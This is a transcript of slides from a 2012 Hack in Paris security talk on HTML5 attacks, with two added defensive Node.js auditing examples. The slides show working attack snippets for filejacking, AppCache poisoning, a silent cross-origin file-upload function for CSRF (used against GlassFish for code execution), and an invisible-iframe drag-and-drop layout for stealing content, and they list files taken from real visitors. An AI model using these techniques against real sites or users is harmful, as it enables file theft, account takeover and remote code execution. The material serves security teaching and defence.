Html5: Something wicked this way comes (Hack in Paris)
The talk given at the Hack In Paris 2012 conference.


Presentation Transcript

    • HTML5
      Krzysztof Kotowicz, SecuRing, @kkotowicz
    • Meet Bob
    • Meet Bob
      #1 Bob is a CSO of
      #1b Bob has interesting stuff
      #2 I don’t like Bob
      #3 I want to pwn Bob
    • Bob’s pwnage stage #1
      • Bob has a hobby - e.g. hacking
      • He has cool file://s
      • I want to get them!
      • He’s not THAT stupid to run EXE, SCR etc.
      • Use filejacking!
    • Filejacking
      • HTML5 directory upload (Chrome only): <input type=file directory>
      • displays this ====> [screenshot of the directory chooser]
      • JS gets read access to all files within chosen folder
    • Filejacking: business plan
      • set up tempting webpage
      • overlay input (CSS) with [image]
      • wait for Bob
      • get files & upload them to your server
    • Filejacking [screenshots]
    • Filejacking
      • I’ve tried this IRL
      • How clueless are users actually?
        • running for ~13 months
        • very limited exposure
        • only websec-oriented visitors
      • 298 clients connected (217 IPs)
      • tons of interesting files
    • Filejacking
      • LOTS of these ------> [screenshot]
      • Downloads/#
      • Downloads/#
      • BratSluts 11 12 04 Sasha Cane Red Tartan SchoolGirl XXX 720p WMV SEXORS.nzb
      • bitches/1300563524557.jpg
      • Flowchart-Fap-To-It.jpg
    • Filejacking
      • websec staff!
      • but surely no private data?
    • Filejacking
      • Wireless Assess points.txt
      • interesting network next to me.txt
      • onlinePasswords.txt
      • s/pw.txt
      • letter of authorization.pdf
      • Staff-<name,surname>.pdf
      • <name,surname> - resume.doc
      • but surely no client data?
    • Filejacking
      • sony reports/
      • Faktura_numer_26_2011_<company>.pdf
      • SecurityQA.SQL.Injection.Results.v1.1.docx
      • websec cred~
      • SSOCrawlTest5.4.097.xml
      • !important - questions for web developers.docx
      • IPS CDE Wireless Audit-January 2011-1 0.docx
      • sslstrip.log~
      • IPS Wireless Testing Schedule April 2011.xls
      • ##### Paros Log.txt
      • 01-####### Corporation (Security Unarmed Guard).xls
      So much for NDAs...
    • Filejacking
      + All your file are belong to me
      + Trivial to set up
      + Filter files by e.g. extension, size etc.
      - Chrome only
      - Requires users prone to social engineering
    • Bob’s pwnage stage #2
      • Bob travels a lot & loves Facebook
      • I want to control Bob’s FB account
        • even when he changes the password in a month
      • I want to fingerprint Bob’s intranet
      • Use rogue access point & AppCache poisoning!
    • AppCache poisoning
      HTML5 Offline Web Applications: <html manifest=cache.manifest>
      • cache.manifest lists URLs to cache
      • cache expires only when manifest is changed
          CACHE MANIFEST
          index.html
          stylesheet.css
          images/logo.png
          scripts/main.js
    • AppCache poisoning
      Poison AppCache for Bob -> Wait -> Profit
    • AppCache poisoning
      • DEMO
      • Quirks used:
        • manifest must be MIME text/cache-manifest
        • Chrome fills AppCache without user confirmation
    • AppCache poisoning
      • tamper http://victim/:
          <html manifest=/robots.txt>
          <script>evil()</script>
      • tamper http://victim/robots.txt:
          CACHE MANIFEST
          CACHE:
          http://victim/
          NETWORK:
          *
    • AppCache poisoning
      Later on, after m-i-t-m:
      1. http://victim/ fetched from AppCache
      2. browser checks for new manifest: GET /robots.txt
      3. receives text/plain robots.txt & ignores it
      4. tainted AppCache is still used
    • AppCache poisoning
      + Poison any URL
      + Payload stays until manually removed
      - Chrome, or Firefox with user interaction
      - Needs active man-in-the-middle to inject
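Added example (Node.js; not code from the talk or from any project): a parser for the cache manifest format the slides describe, plus an audit of a document/manifest pair the way a client or an intercepting proxy would observe it. It reports what the manifest would pin in the cache and which of the attack's preconditions are present: the page arriving over plain HTTP (the man-in-the-middle injection point), and a manifest living at a path that is not a manifest file, such as /robots.txt. Function names, hostnames and sample responses are constructed.

```javascript
// Added example, not the talk's code. Parses a cache manifest and audits an
// observed page for the conditions the poisoning above depends on.

// Parse a cache manifest into its three sections. Entries before any section
// header belong to CACHE; "#" lines are comments.
function parseCacheManifest(text) {
  const lines = text.split(/\r?\n/);
  if (lines[0].trim() !== "CACHE MANIFEST") throw new Error("not a cache manifest");
  const m = { cache: [], network: [], fallback: [] };
  let section = "cache";
  for (const raw of lines.slice(1)) {
    const line = raw.trim();
    if (!line || line.startsWith("#")) continue;
    const head = /^(CACHE|NETWORK|FALLBACK):$/.exec(line);
    if (head) { section = head[1].toLowerCase(); continue; }
    if (section === "fallback") {
      const [from, to] = line.split(/\s+/);
      m.fallback.push({ from, to });
    } else {
      m[section].push(line);
    }
  }
  return m;
}

// Read the manifest attribute off the <html> start tag (null when absent).
function findManifestAttribute(html) {
  const tag = /<html\b[^>]*>/i.exec(html);
  if (!tag) return null;
  const a = /\bmanifest\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(tag[0]);
  if (!a) return null;
  return a[1] !== undefined ? a[1] : a[2] !== undefined ? a[2] : a[3];
}

// Audit one observed page. Returns what the manifest pins in the cache and
// the preconditions of the poisoning that are present:
//   PLAIN_HTTP            - page over http://, so a MITM can inject the manifest attribute
//   UNUSUAL_MANIFEST_PATH - manifest is not a .appcache/.manifest file (e.g. /robots.txt)
//   WRONG_MANIFEST_MIME   - not served as text/cache-manifest; the browser rejects the
//                           update and keeps whatever is already cached
function auditAppCache({ documentUrl, html, manifestContentType, manifestText }) {
  const ref = findManifestAttribute(html);
  if (ref === null) return null;                       // AppCache not in use
  const docUrl = new URL(documentUrl);
  const manifestUrl = new URL(ref, docUrl.href);
  const findings = [];
  if (docUrl.protocol === "http:") findings.push("PLAIN_HTTP");
  if (!/\.(appcache|manifest)$/i.test(manifestUrl.pathname)) findings.push("UNUSUAL_MANIFEST_PATH");
  if (!/^text\/cache-manifest\b/i.test(manifestContentType || "")) findings.push("WRONG_MANIFEST_MIME");
  const m = parseCacheManifest(manifestText);
  return {
    manifestUrl: manifestUrl.href,
    cachedUrls: m.cache.map((e) => new URL(e, manifestUrl.href).href),
    networkWildcard: m.network.includes("*"),
    findings,
  };
}

// Constructed sample 1: the tampered responses shown above, as the victim's
// browser receives them through the rogue access point.
const POISONED_VICTIM = {
  documentUrl: "http://victim/",
  html: "<html manifest=/robots.txt><script>/* injected */</script></html>",
  manifestContentType: "text/cache-manifest",
  manifestText: "CACHE MANIFEST\nCACHE:\nhttp://victim/\nNETWORK:\n*\n",
};

// Constructed sample 2: a legitimate offline app like the one above, over TLS.
const BENIGN_APP = {
  documentUrl: "https://app.example/index.html",
  html: '<!DOCTYPE html><html manifest="cache.manifest"><body>app</body></html>',
  manifestContentType: "text/cache-manifest; charset=utf-8",
  manifestText: "CACHE MANIFEST\n# v1\nindex.html\nstylesheet.css\nimages/logo.png\nscripts/main.js\n",
};

console.log(auditAppCache(POISONED_VICTIM));
console.log(auditAppCache(BENIGN_APP));
```

The findings list deliberately contains only the conditions a defender can change. A manifest that caches the site root and declares `NETWORK: *` looks the same whether it is legitimate or injected, which is why the audit reports those as data for review rather than as findings; the control that actually removes the attack is serving the site over TLS so that nothing can be injected in transit.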
    • Bob’s pwnage stage #3
      • Bob loves sharing photos (Flickr?)
      • I want to replace Bob as CSO
      • What if Bob uploaded some discrediting files?
      • Try silent file upload
    • Silent file upload
      • File upload purely in Javascript
      • Emulates <input type=file> with:
        • any file name
        • any file content
      • File constructed in Javascript (it’s not a real file!)
      • Uses Cross Origin Resource Sharing
    • Silent file upload
      • Cross Origin Resource Sharing = cross domain AJAX
          xhr = new XMLHttpRequest();
          xhr.open("POST", "http://victim", true);
          xhr.setRequestHeader("Content-Type", "text/plain");
          xhr.withCredentials = "true"; // send cookies
          xhr.send("Anything I want");
    • Silent file upload
      • raw multipart/form-data request
          function fileUpload(url, fileData, fileName) {
            var boundary = "xxxxxxxxx",
                xhr = new XMLHttpRequest();
            xhr.open("POST", url, true);
            xhr.withCredentials = "true"; // send cookies
            xhr.setRequestHeader("Content-Type", "multipart/form-data,boundary=" + boundary);
            // hand-built multipart body: one "file" part, CRLF line endings
            var b = "--" + boundary + "\r\n" +
                    "Content-Disposition: form-data; name=\"contents\"; filename=\"" + fileName + "\"\r\n" +
                    "Content-Type: application/octet-stream\r\n\r\n" +
                    fileData + "\r\n" +
                    "--" + boundary + "--";
            xhr.setRequestHeader("Content-Length", b.length); // forbidden header; browsers silently ignore it
            xhr.send(b);
          }
    • Silent file upload
      + No user interaction
      + Works in most browsers
      + You can add more form fields
      - CSRF flaw needed
      - No access to response
    • Silent file upload: DEMO
    • Silent file upload
      • GlassFish Enterprise Server 3.1
        • CVE 2012-0550 by Roberto Suggi Liverani
      • // logUrl = http://glassfishserver/management/domain/applications/application;
        fileUpload(c, "maliciousarchive.war");
      • logged admin + CSRF = RCE
    • Same origin policy
      • makes web (relatively) safe
        • restricts cross-origin communication
      • can be relaxed though
        • crossdomain.xml
        • document.domain
        • HTML5 Cross Origin Resource Sharing
      • or ignored...
        • UI redressing
    • UI Redressing? Jedi mind tricks on victim users
    • UI Redressing
      • This is not the page you’re looking at
      • This is not the thing you’re clicking
      • ... dragging
      • ... typing
      • ... copying
      • Victims attack the applications for us
    • Clickjacking?
    • Bob’s pwnage stage #4
      • Bob likes online games
      • I found a vulnerable website used by Bob
      • Bob would have to type the payload himself :-(
      • Make Bob play a game!
    • Drag into
      • Put attacker’s content into victim form
      Demo
    • Drag into
      + Inject arbitrary content
      + Trigger self-XSS
      - Firefox only (will die soon!)
      - X-Frame-Options
    • Bob’s pwnage stage #5
      • Bob has access to internal HR application
      • I want to know his salary
      • Make Bob play a game (again)!
    • Drag out content extraction
      [diagram, built up over three slides: a game image layered over an invisible victim <iframe> and an invisible <textarea>]
    • Drag out content extraction
        <div id=game style="position:relative">
          <img style="position:absolute;..." src="paper.png" />
          <img style="position:absolute;..." src="trash.png" />
          <iframe scrolling=no id=iframe style="position:absolute;opacity:0;..."></iframe>
          <textarea style="position:absolute; opacity:0;..." id=dropper></textarea>
        </div>
    • Drag out content extraction [screenshots]
    • Drag out content extraction: Demo
    • Drag out content extraction
      + Access sensitive content cross domain
      - Firefox only (will die soon!)
      - X-Frame-Options
    • Summary
      • HTML5 is attacker’s friend too!
      • Don’t get framed
      • User-based pwnage FTW
      Developers: Use X-Frame-Options: DENY
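Added example (Node.js; not code from the talk or from any project): both drag-based attacks above need the victim page rendered inside an attacker-controlled <iframe>, and the summary's advice is the header that refuses that. The block builds the headers a server should send and audits a response's headers to decide whether another origin can still frame it, including the Content-Security-Policy frame-ancestors directive that has since replaced X-Frame-Options and the obsolete ALLOW-FROM value that gives no protection. Function names and sample responses are constructed.

```javascript
// Added example, not the talk's code: emit and audit anti-framing headers.

// Headers for a page that must never be framed ("deny") or only by its own
// origin ("sameorigin"). frame-ancestors is the successor of X-Frame-Options;
// sending both covers old and new browsers.
function antiFramingHeaders(policy) {
  const table = {
    deny:       { "X-Frame-Options": "DENY",       "Content-Security-Policy": "frame-ancestors 'none'" },
    sameorigin: { "X-Frame-Options": "SAMEORIGIN", "Content-Security-Policy": "frame-ancestors 'self'" },
  };
  if (!table[policy]) throw new Error("unknown framing policy: " + policy);
  return { ...table[policy] };
}

// All values of a header, case-insensitively. Node's http module hands
// repeated headers over as arrays, so flatten those too.
function headerValues(headers, name) {
  return Object.entries(headers)
    .filter(([k]) => k.toLowerCase() === name)
    .flatMap(([, v]) => (Array.isArray(v) ? v : [v]))
    .map(String);
}

// Source lists of every frame-ancestors directive across all CSP headers.
function frameAncestorLists(headers) {
  const lists = [];
  for (const policy of headerValues(headers, "content-security-policy")) {
    for (const directive of policy.split(";")) {
      const tokens = directive.trim().split(/\s+/).filter(Boolean);
      if (tokens[0] && tokens[0].toLowerCase() === "frame-ancestors") {
        lists.push(tokens.slice(1).map((s) => s.toLowerCase()));
      }
    }
  }
  return lists;
}

// Can a page on another origin frame this response?
// Returns { framable, via, note }; via names the header that decided.
function auditFraming(headers) {
  const lists = frameAncestorLists(headers);
  if (lists.length > 0) {
    // CSP Level 2: when frame-ancestors is present, X-Frame-Options is
    // ignored. With several policies every one must allow the framer;
    // an empty source list means 'none'.
    const allowsOther = lists.every(
      (l) => l.length > 0 && !l.includes("'none'") && l.some((s) => s !== "'self'"),
    );
    return { framable: allowsOther, via: "frame-ancestors",
             note: lists.map((l) => l.join(" ")).join(" | ") };
  }
  const xfo = headerValues(headers, "x-frame-options").map((v) => v.trim().toUpperCase());
  if (xfo.length === 0) return { framable: true, via: "none", note: "no anti-framing header" };
  if (new Set(xfo).size > 1) {
    // Browsers differ on conflicting values; treat as unprotected so it gets fixed.
    return { framable: true, via: "x-frame-options", note: "conflicting values: " + xfo.join(", ") };
  }
  const v = xfo[0];
  if (v === "DENY" || v === "SAMEORIGIN") return { framable: false, via: "x-frame-options", note: v };
  if (v.startsWith("ALLOW-FROM")) {
    return { framable: true, via: "x-frame-options",
             note: "ALLOW-FROM is obsolete and not honoured by current browsers" };
  }
  return { framable: true, via: "x-frame-options", note: "invalid value, ignored by browsers: " + v };
}

// Constructed responses to audit.
const SAMPLE_RESPONSES = {
  hrApp:   { "content-type": "text/html", "x-frame-options": "DENY" },
  legacy:  { "X-Frame-Options": "ALLOW-FROM https://partner.example" },
  partner: { "Content-Security-Policy": "default-src 'self'; frame-ancestors 'self' https://partner.example",
             "X-Frame-Options": "DENY" },
  bare:    { "content-type": "text/html" },
};

for (const [name, h] of Object.entries(SAMPLE_RESPONSES)) console.log(name, auditFraming(h));
```

The "partner" sample is the case worth remembering: it sends X-Frame-Options: DENY, yet any browser that understands frame-ancestors will let https://partner.example frame the page, because the CSP directive takes precedence. An audit that only greps for X-Frame-Options would call that response safe.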
    • Wake up, I’m done!
      Twitter: @kkotowicz
      Thanks @0x6D6172696F, @garethheyes, @theKos, @7a_, @lavakumark, @malerisch, @skeptic_fx, ....